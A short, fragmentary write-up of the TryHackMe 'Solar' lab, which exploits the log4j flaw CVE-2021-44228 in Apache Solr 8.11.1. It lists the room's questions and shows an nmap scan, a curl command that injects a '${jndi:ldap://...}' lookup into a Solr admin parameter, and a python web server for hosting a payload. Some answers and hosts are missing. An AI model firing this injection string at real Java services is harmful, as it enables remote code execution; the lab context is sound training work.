Skip to content

Exploiting log4j | TryHackMe Solar Write Up

CVE-2021-44228 Apache Solr 8.11.1

└─$ nmap solar.thm -p- -sC -sV

What service is running on port 8983? (Just the name of the software)

Apache Solr

Open the service running on port 8983 in your browser:

└─$ firefox http://solar.thm:8983

What is the -Dsolr.log.dir argument set to, displayed on the front page?


Which file includes contains this repeated entry? (Just the filename itself, no path needed)


What “path” or URL endpoint is indicated in these repeated entries?


Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://\}'

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Listening on
curl '$\{jndi:ldap://\}'
python3 -m http.server

What is the full path of the specific file?